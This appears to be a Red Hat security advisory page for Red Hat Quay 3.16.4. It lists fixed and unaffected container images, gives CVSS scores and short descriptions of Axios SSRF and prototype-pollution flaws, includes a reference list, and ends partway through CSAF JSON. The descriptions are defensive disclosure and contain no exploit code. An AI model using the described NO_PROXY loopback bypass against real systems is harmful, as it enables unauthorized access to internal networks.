Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le		—

Threats

Impact Important

CVE-2026-42043

A flaw was found in Axios, a promise-based HTTP client. An attacker who can control the destination address of an Axios request can exploit this vulnerability. By using specific internal network addresses (within the 127.0.0.0/8 range, excluding 127.0.0.1), the attacker can completely bypass the NO_PROXY protection, potentially leading to unauthorized access or information disclosure within the network. This issue is an incomplete fix for a previous vulnerability.

7.2 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

CWE-918 - Server-Side Request Forgery (SSRF)

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix

Known not affected 19 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le		—

Threats

Impact Important

CVE-2026-42044

A flaw was found in Axios, a widely used HTTP client. This vulnerability, known as a Prototype Pollution "Gadget" attack, allows a remote attacker to subtly alter JSON API responses. By manipulating a specific function, an attacker can selectively modify data within these responses. This could lead to significant security breaches, including unauthorized privilege escalation, fraudulent balance manipulation, or bypassing critical authorization checks.

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix Workaround

Known not affected 19 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le	—	Workaround

Threats

Impact Important

References

261 references

URL	Category
https://access.redhat.com/errata/RHSA-2026:19375	self
https://access.redhat.com/security/cve/CVE-2025-61726	external
https://access.redhat.com/security/cve/CVE-2025-62718	external
https://access.redhat.com/security/cve/CVE-2026-2377	external
https://access.redhat.com/security/cve/CVE-2026-25679	external
https://access.redhat.com/security/cve/CVE-2026-27137	external
https://access.redhat.com/security/cve/CVE-2026-27459	external
https://access.redhat.com/security/cve/CVE-2026-27962	external
https://access.redhat.com/security/cve/CVE-2026-28802	external
https://access.redhat.com/security/cve/CVE-2026-29063	external
https://access.redhat.com/security/cve/CVE-2026-29074	external
https://access.redhat.com/security/cve/CVE-2026-30922	external
https://access.redhat.com/security/cve/CVE-2026-32280	external
https://access.redhat.com/security/cve/CVE-2026-32282	external
https://access.redhat.com/security/cve/CVE-2026-32286	external
https://access.redhat.com/security/cve/CVE-2026-32589	external
https://access.redhat.com/security/cve/CVE-2026-32590	external
https://access.redhat.com/security/cve/CVE-2026-32597	external
https://access.redhat.com/security/cve/CVE-2026-33186	external
https://access.redhat.com/security/cve/CVE-2026-33894	external
https://access.redhat.com/security/cve/CVE-2026-34986	external
https://access.redhat.com/security/cve/CVE-2026-39892	external
https://access.redhat.com/security/cve/CVE-2026-40192	external
https://access.redhat.com/security/cve/CVE-2026-40895	external
https://access.redhat.com/security/cve/CVE-2026-42033	external
https://access.redhat.com/security/cve/CVE-2026-42035	external
https://access.redhat.com/security/cve/CVE-2026-42039	external
https://access.redhat.com/security/cve/CVE-2026-42041	external
https://access.redhat.com/security/cve/CVE-2026-42043	external
https://access.redhat.com/security/cve/CVE-2026-42044	external
https://access.redhat.com/security/cve/CVE-2026-4427	external
https://access.redhat.com/security/cve/CVE-2026-4598	external
https://access.redhat.com/security/cve/CVE-2026-4599	external
https://access.redhat.com/security/cve/CVE-2026-4600	external
https://access.redhat.com/security/cve/CVE-2026-4601	external
https://access.redhat.com/security/cve/CVE-2026-4602	external
https://access.redhat.com/security/updates/classi…	external
https://security.access.redhat.com/data/csaf/v2/a…	self
https://access.redhat.com/security/cve/CVE-2025-61726	self
https://bugzilla.redhat.com/show_bug.cgi?id=2434432	external
https://www.cve.org/CVERecord?id=CVE-2025-61726	external
https://nvd.nist.gov/vuln/detail/CVE-2025-61726	external
https://go.dev/cl/736712	external
https://go.dev/issue/77101	external
https://groups.google.com/g/golang-announce/c/Vd2…	external
https://pkg.go.dev/vuln/GO-2026-4341	external
https://access.redhat.com/security/cve/CVE-2025-62718	self
https://bugzilla.redhat.com/show_bug.cgi?id=2456913	external
https://www.cve.org/CVERecord?id=CVE-2025-62718	external
https://nvd.nist.gov/vuln/detail/CVE-2025-62718	external
https://datatracker.ietf.org/doc/html/rfc1034#sec…	external
https://datatracker.ietf.org/doc/html/rfc3986#sec…	external
https://github.com/axios/axios/commit/fb3befb6daa…	external
https://github.com/axios/axios/pull/10661	external
https://github.com/axios/axios/releases/tag/v1.15.0	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-2377	self
https://bugzilla.redhat.com/show_bug.cgi?id=2439201	external
https://www.cve.org/CVERecord?id=CVE-2026-2377	external
https://nvd.nist.gov/vuln/detail/CVE-2026-2377	external
https://access.redhat.com/security/cve/CVE-2026-4427	self
https://www.cve.org/CVERecord?id=CVE-2026-4427	external
https://access.redhat.com/security/cve/CVE-2026-4598	self
https://bugzilla.redhat.com/show_bug.cgi?id=2450210	external
https://www.cve.org/CVERecord?id=CVE-2026-4598	external
https://nvd.nist.gov/vuln/detail/CVE-2026-4598	external
https://gist.github.com/Kr0emer/a1bf5cd4547cc630d…	external
https://github.com/kjur/jsrsasign/commit/ca5b0272…	external
https://github.com/kjur/jsrsasign/pull/648	external
https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-1…	external
https://access.redhat.com/security/cve/CVE-2026-4599	self
https://bugzilla.redhat.com/show_bug.cgi?id=2450207	external
https://www.cve.org/CVERecord?id=CVE-2026-4599	external
https://nvd.nist.gov/vuln/detail/CVE-2026-4599	external
https://gist.github.com/Kr0emer/081681818b51605c9…	external
https://github.com/kjur/jsrsasign/commit/ee4b0134…	external
https://github.com/kjur/jsrsasign/pull/647	external
https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-1…	external
https://access.redhat.com/security/cve/CVE-2026-4600	self
https://bugzilla.redhat.com/show_bug.cgi?id=2450208	external
https://www.cve.org/CVERecord?id=CVE-2026-4600	external
https://nvd.nist.gov/vuln/detail/CVE-2026-4600	external
https://gist.github.com/Kr0emer/bf15ddc097176e951…	external
https://github.com/kjur/jsrsasign/commit/37b4c06b…	external
https://github.com/kjur/jsrsasign/pull/646	external
https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-1…	external
https://access.redhat.com/security/cve/CVE-2026-4601	self
https://bugzilla.redhat.com/show_bug.cgi?id=2450209	external
https://www.cve.org/CVERecord?id=CVE-2026-4601	external
https://nvd.nist.gov/vuln/detail/CVE-2026-4601	external
https://gist.github.com/Kr0emer/93789fe6efe5519db…	external
https://github.com/kjur/jsrsasign/commit/0710e392…	external
https://github.com/kjur/jsrsasign/pull/645	external
https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-1…	external
https://access.redhat.com/security/cve/CVE-2026-4602	self
https://bugzilla.redhat.com/show_bug.cgi?id=2450206	external
https://www.cve.org/CVERecord?id=CVE-2026-4602	external
https://nvd.nist.gov/vuln/detail/CVE-2026-4602	external
https://gist.github.com/Kr0emer/7ecd2be7d17419e46…	external
https://github.com/kjur/jsrsasign/commit/5ea1c32b…	external
https://github.com/kjur/jsrsasign/pull/650	external
https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-1…	external
https://access.redhat.com/security/cve/CVE-2026-25679	self
https://bugzilla.redhat.com/show_bug.cgi?id=2445356	external
https://www.cve.org/CVERecord?id=CVE-2026-25679	external
https://nvd.nist.gov/vuln/detail/CVE-2026-25679	external
https://go.dev/cl/752180	external
https://go.dev/issue/77578	external
https://groups.google.com/g/golang-announce/c/Edh…	external
https://pkg.go.dev/vuln/GO-2026-4601	external
https://access.redhat.com/security/cve/CVE-2026-27137	self
https://bugzilla.redhat.com/show_bug.cgi?id=2445345	external
https://www.cve.org/CVERecord?id=CVE-2026-27137	external
https://nvd.nist.gov/vuln/detail/CVE-2026-27137	external
https://go.dev/cl/752182	external
https://go.dev/issue/77952	external
https://pkg.go.dev/vuln/GO-2026-4599	external
https://access.redhat.com/security/cve/CVE-2026-27459	self
https://bugzilla.redhat.com/show_bug.cgi?id=2448503	external
https://www.cve.org/CVERecord?id=CVE-2026-27459	external
https://nvd.nist.gov/vuln/detail/CVE-2026-27459	external
https://github.com/pyca/pyopenssl/blob/358cbf29c4…	external
https://github.com/pyca/pyopenssl/commit/57f09bb4…	external
https://github.com/pyca/pyopenssl/security/adviso…	external
https://access.redhat.com/security/cve/CVE-2026-27962	self
https://bugzilla.redhat.com/show_bug.cgi?id=2448164	external
https://www.cve.org/CVERecord?id=CVE-2026-27962	external
https://nvd.nist.gov/vuln/detail/CVE-2026-27962	external
https://github.com/authlib/authlib/commit/a5d4b2d…	external
https://github.com/authlib/authlib/releases/tag/v1.6.9	external
https://github.com/authlib/authlib/security/advis…	external
https://access.redhat.com/security/cve/CVE-2026-28802	self
https://bugzilla.redhat.com/show_bug.cgi?id=2445120	external
https://www.cve.org/CVERecord?id=CVE-2026-28802	external
https://nvd.nist.gov/vuln/detail/CVE-2026-28802	external
https://github.com/authlib/authlib/commit/a61c2ac…	external
https://github.com/authlib/authlib/commit/b87c32e…	external
https://github.com/authlib/authlib/security/advis…	external
https://access.redhat.com/security/cve/CVE-2026-29063	self
https://bugzilla.redhat.com/show_bug.cgi?id=2445291	external
https://www.cve.org/CVERecord?id=CVE-2026-29063	external
https://nvd.nist.gov/vuln/detail/CVE-2026-29063	external
https://github.com/immutable-js/immutable-js/rele…	external
https://github.com/immutable-js/immutable-js/rele…	external
https://github.com/immutable-js/immutable-js/rele…	external
https://github.com/immutable-js/immutable-js/secu…	external
https://access.redhat.com/security/cve/CVE-2026-29074	self
https://bugzilla.redhat.com/show_bug.cgi?id=2445132	external
https://www.cve.org/CVERecord?id=CVE-2026-29074	external
https://nvd.nist.gov/vuln/detail/CVE-2026-29074	external
https://github.com/svg/svgo/security/advisories/G…	external
https://access.redhat.com/security/cve/CVE-2026-30922	self
https://bugzilla.redhat.com/show_bug.cgi?id=2448553	external
https://www.cve.org/CVERecord?id=CVE-2026-30922	external
https://nvd.nist.gov/vuln/detail/CVE-2026-30922	external
https://github.com/pyasn1/pyasn1/commit/25ad481c1…	external
https://github.com/pyasn1/pyasn1/security/advisor…	external
https://access.redhat.com/security/cve/CVE-2026-32280	self
https://bugzilla.redhat.com/show_bug.cgi?id=2456339	external
https://www.cve.org/CVERecord?id=CVE-2026-32280	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32280	external
https://go.dev/cl/758320	external
https://go.dev/issue/78282	external
https://groups.google.com/g/golang-announce/c/0uY…	external
https://pkg.go.dev/vuln/GO-2026-4947	external
https://access.redhat.com/security/cve/CVE-2026-32282	self
https://bugzilla.redhat.com/show_bug.cgi?id=2456336	external
https://www.cve.org/CVERecord?id=CVE-2026-32282	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32282	external
https://go.dev/cl/763761	external
https://go.dev/issue/78293	external
https://pkg.go.dev/vuln/GO-2026-4864	external
https://access.redhat.com/security/cve/CVE-2026-32286	self
https://bugzilla.redhat.com/show_bug.cgi?id=2451847	external
https://www.cve.org/CVERecord?id=CVE-2026-32286	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32286	external
https://github.com/golang/vulndb/issues/4518	external
https://github.com/jackc/pgx/issues/2507	external
https://pkg.go.dev/vuln/GO-2026-4518	external
https://access.redhat.com/security/cve/CVE-2026-32589	self
https://bugzilla.redhat.com/show_bug.cgi?id=2446963	external
https://www.cve.org/CVERecord?id=CVE-2026-32589	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32589	external
https://access.redhat.com/security/cve/CVE-2026-32590	self
https://bugzilla.redhat.com/show_bug.cgi?id=2446964	external
https://www.cve.org/CVERecord?id=CVE-2026-32590	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32590	external
https://access.redhat.com/security/cve/CVE-2026-32597	self
https://bugzilla.redhat.com/show_bug.cgi?id=2447194	external
https://www.cve.org/CVERecord?id=CVE-2026-32597	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32597	external
https://github.com/jpadilla/pyjwt/security/adviso…	external
https://access.redhat.com/security/cve/CVE-2026-33186	self
https://bugzilla.redhat.com/show_bug.cgi?id=2449833	external
https://www.cve.org/CVERecord?id=CVE-2026-33186	external
https://nvd.nist.gov/vuln/detail/CVE-2026-33186	external
https://github.com/grpc/grpc-go/security/advisori…	external
https://access.redhat.com/security/cve/CVE-2026-33894	self
https://bugzilla.redhat.com/show_bug.cgi?id=2452464	external
https://www.cve.org/CVERecord?id=CVE-2026-33894	external
https://nvd.nist.gov/vuln/detail/CVE-2026-33894	external
https://datatracker.ietf.org/doc/html/rfc2313#section-8	external
https://github.com/digitalbazaar/forge/security/a…	external
https://mailarchive.ietf.org/arch/msg/openpgp/5rn…	external
https://www.rfc-editor.org/rfc/rfc8017.html	external
https://access.redhat.com/security/cve/CVE-2026-34986	self
https://bugzilla.redhat.com/show_bug.cgi?id=2455470	external
https://www.cve.org/CVERecord?id=CVE-2026-34986	external
https://nvd.nist.gov/vuln/detail/CVE-2026-34986	external
https://github.com/go-jose/go-jose/security/advis…	external
https://pkg.go.dev/github.com/go-jose/go-jose/v4#…	external
https://access.redhat.com/security/cve/CVE-2026-39892	self
https://bugzilla.redhat.com/show_bug.cgi?id=2456735	external
https://www.cve.org/CVERecord?id=CVE-2026-39892	external
https://nvd.nist.gov/vuln/detail/CVE-2026-39892	external
http://www.openwall.com/lists/oss-security/2026/0…	external
https://github.com/pyca/cryptography/commit/622d6…	external
https://github.com/pyca/cryptography/security/adv…	external
https://access.redhat.com/security/cve/CVE-2026-40192	self
https://bugzilla.redhat.com/show_bug.cgi?id=2458856	external
https://www.cve.org/CVERecord?id=CVE-2026-40192	external
https://nvd.nist.gov/vuln/detail/CVE-2026-40192	external
https://github.com/python-pillow/Pillow/commit/3c…	external
https://github.com/python-pillow/Pillow/pull/9521	external
https://github.com/python-pillow/Pillow/security/…	external
https://pillow.readthedocs.io/en/stable/releaseno…	external
https://access.redhat.com/security/cve/CVE-2026-40895	self
https://bugzilla.redhat.com/show_bug.cgi?id=2460297	external
https://www.cve.org/CVERecord?id=CVE-2026-40895	external
https://nvd.nist.gov/vuln/detail/CVE-2026-40895	external
https://github.com/follow-redirects/follow-redire…	external
https://access.redhat.com/security/cve/CVE-2026-42033	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461607	external
https://www.cve.org/CVERecord?id=CVE-2026-42033	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42033	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-42035	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461606	external
https://www.cve.org/CVERecord?id=CVE-2026-42035	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42035	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-42039	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461630	external
https://www.cve.org/CVERecord?id=CVE-2026-42039	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42039	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-42041	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461629	external
https://www.cve.org/CVERecord?id=CVE-2026-42041	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42041	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-42043	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461626	external
https://www.cve.org/CVERecord?id=CVE-2026-42043	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42043	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-42044	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461624	external
https://www.cve.org/CVERecord?id=CVE-2026-42044	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42044	external
https://github.com/axios/axios/security/advisorie…	external

Acknowledgments

Antony Di Scala Michael Whale

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://access.redhat.com/security/updates/classification/",
      "text": "Important"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "Red Hat Quay 3.16.4 is now available with bug fixes.",
        "title": "Topic"
      },
      {
        "category": "general",
        "text": "Quay 3.16.4",
        "title": "Details"
      },
      {
        "category": "legal_disclaimer",
        "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
        "title": "Terms of Use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://access.redhat.com/security/team/contact/",
      "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
      "name": "Red Hat Product Security",
      "namespace": "https://www.redhat.com"
    },
    "references": [
      {
        "category": "self",
        "summary": "https://access.redhat.com/errata/RHSA-2026:19375",
        "url": "https://access.redhat.com/errata/RHSA-2026:19375"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2025-61726",
        "url": "https://access.redhat.com/security/cve/CVE-2025-61726"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2025-62718",
        "url": "https://access.redhat.com/security/cve/CVE-2025-62718"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-2377",
        "url": "https://access.redhat.com/security/cve/CVE-2026-2377"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-25679",
        "url": "https://access.redhat.com/security/cve/CVE-2026-25679"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-27137",
        "url": "https://access.redhat.com/security/cve/CVE-2026-27137"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-27459",
        "url": "https://access.redhat.com/security/cve/CVE-2026-27459"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-27962",
        "url": "https://access.redhat.com/security/cve/CVE-2026-27962"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-28802",
        "url": "https://access.redhat.com/security/cve/CVE-2026-28802"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-29063",
        "url": "https://access.redhat.com/security/cve/CVE-2026-29063"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-29074",
        "url": "https://access.redhat.com/security/cve/CVE-2026-29074"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-30922",
        "url": "https://access.redhat.com/security/cve/CVE-2026-30922"
      },
      {
        "category": "external",
